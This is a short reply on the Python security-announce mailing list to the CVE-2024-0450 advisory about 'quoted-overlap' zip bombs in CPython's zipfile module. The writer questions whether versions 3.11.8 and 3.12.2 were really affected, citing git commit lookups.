Re: [Security-announce][CVE-2024-0450] Quoted zip-bomb protection for zipfile
![](https://secure.gravatar.com/avatar/ff5429ef741b434eb2011692832f810e.jpg?s=120&d=mm&r=g)
6 Apr
2024
6 Apr
'24
1:01 p.m.
Hello, I am a bit confused about this. On Tue, 2024-03-19 at 11:10 -0400, Ee Durbin wrote:
An issue was found in the CPython `zipfile` module affecting versions 3.12.2, 3.11.8, 3.10.13, 3.9.18, and 3.8.18 and prior.
It seems that 3.11.8 and 3.12.2 already contained a patch for this: $ git describe --contains a956e510f6336d5ae111ba429a61c3ade30a7549 v3.11.8~173 $ git describe --contains fa181fcf2156f703347b03a3b1966ce47be8ab3b v3.12.2~196
The zipfile module is vulnerable to “quoted-overlap” zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed versions of CPython makes the zipfile module reject zip archives which overlap entries in the archive.
-- Best regards, Michał Górny
89
Age (days ago)
89
Last active (days ago)
0 comments
1 participants
participants (1)
-
Michał Górny